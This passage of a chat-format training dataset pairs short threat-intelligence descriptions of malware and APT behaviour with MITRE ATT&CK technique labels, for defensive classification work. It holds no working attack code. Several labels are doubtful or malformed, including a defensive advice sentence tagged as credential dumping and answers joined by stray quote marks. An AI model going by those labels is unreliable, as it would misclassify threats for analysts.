- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 performed password brute-force attacks on the local admin account."
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ECCENTRICBANDWAGON can capture and store keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unlike the original geacon, Blackrota uses gobfuscate to obfuscate the. source code before compiling. gobfuscate is an open-source tool for Go code. obfuscation, which can obfuscate the following elements of Go source code. with random character substitutions:"
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Iranian government-sponsored APT actors may have made modifications to the Task Scheduler. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity: SynchronizeTimeZone GoogleChangeManagement MicrosoftOutLookUpdater MicrosoftOutLookUpdateSchedule"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca adopted Cloudflare as a proxy for compromised servers."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has used Unix shell scripts to execute commands in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the part of a hard drive that tells the computer how to load its operating system"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the computer name and serial number for the storage volume C:\\."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command systeminfo."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TechnoCreep is a previously undocumented C# backdoor that communicates with a C&C server via TCP sockets. In this case, commands are not read from a file, but received in an exchange of messages"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTF documents sent in the observed campaigns contain exploits for several vulnerabilities in Microsoft Office, and they seem to be created using a version of an exploit toolkit, often referred to as Threadkit. Threadkit is not exclusively used by the actors behind the observed attacks but also by other groups utilizing various payloads, including Trickbot, Lokibot, SmokeLoader and some other banking malware. The embedded object triggers a download of an HTML page containing the VBScript that exploits the vulnerability and launches the shellcode. The HTML component of the exploit is based on the original exploit code discovered in May this year. CVE-2018-8174 VB script exploit code"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variable Name Description gdu Google Drive URL for downloading files to the Google Drive account gduu Google Drive URL for uploading files to the Google Drive account gdue Google Drive URL for updating a file on the Google Drive account gdo2t Google Drive URL used to get the OAUTH access_token client_id The client_id for the OAUTH application cs The client_secret for OAUTH r_t The refresh_token for OAUTH Table 6 Variables used to store settings needed to use Google Drive as a C2 To obtain an OAUTH access token to authenticate to the actor provided Google account, the Trojan sends an HTTP POST request to a URL stored in the gdo2t variable with grant_type, client_id, client_secret, and refresh_token fields added to the HTTP header and in the POST data"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also can make and send screenshots to the C&C, as well as any file that matches a specified mask."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can check for connected USB devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell File Analysis The PowerShell script employs several layers of obfuscation to hide its actual functionality"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It can terminate IDA debugger, x32dbg, OllyDbg and more processes to avoid dynamic analysis, close databases, office programs and security tools"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has gathered a process list by using Tasklist.exe."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Alerts for credential theft tools and privileged account lockouts should be investigated"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth searches for different processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used certutil to decode base64-encoded files on victims."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA runs the \"whoami\" and \"query user\" commands."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub has de-obsfuscated XOR encrypted payloads in WebSocket messages."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find NO functionality within Xbash that would enable restoration after the ransom is paid"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component is a Web Shell payload."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can retrieve C2 domain information from actor-controlled S3 buckets."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in."
- },
- {
- "role": "assistant",
- "content": "T1547 - Boot or Logon Autostart Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has deleted data staged in tmp files after exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors gained initial access by exploiting vulnerabilities in JBoss webservers."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1007 - System Service Discovery', 'T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A shortcut file is generated in the following path: %TEMP%\\~Update.lnk This ‘~Update.lnk’ file is then copied to a filename of ‘Windows help.lnk’, which is placed in the startup path previously identified"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugin proceeds to iterate through all connected drives on the system, looking for removable drives"
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke C2 traffic has been encrypted with RC4 and AES."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses AES to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of taking an image of and uploading the current desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Juniper Threat Labs has been monitoring a campaign that pushes a new IcedID banking trojan. This new campaign changes tactics by injecting into msiexec.exe to conceal itself and use full steganography for downloading its modules and configurations. Previous versions of IcedID injected into svchost.exe and downloaded encrypted modules and config as “.dat” files. IcedID is a banking malware that performs Man-in-the-Browser attacks to steal financial information"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can remove its persistence and delete itself."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NOKKI payload is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior being executed in a new process. Persistence is achieved by writing the file path to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svstartup registry key"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures and DES-encrypts credentials before writing the username and password to a log file, C:\\log.txt."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We analyzed a new RATANKBA variant that uses a PowerShell script instead of its more traditional PE executable form"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus achieved persistence by placing a malicious executable in the startup directory and has added the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to the Registry."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has searched for anti-malware strings and anti-virus processes running on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information."
- },
- {
- "role": "assistant",
- "content": "T1608.004 - Drive-by Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content of malicious payloads downloaded during execution. The main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a malicious file"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the local system time from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware has used IRC for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT has the capability to capture video from a webcam."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist can use \"GetUserNameW\", \"GetComputerNameW\", and \"GetComputerNameExW\" to gather information."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CopyKittens has used \"-w hidden\" and \"-windowstyle hidden\" to conceal PowerShell windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer executes payloads using the Windows API call CreateProcessW()."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has used AES encryption for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "variants reported on in 2014 and 2015 used a simple XOR cipher for C2."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can use `cmd.exe` for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has collected clipboard data in plaintext."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM used Port 44443 for its VNC module."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
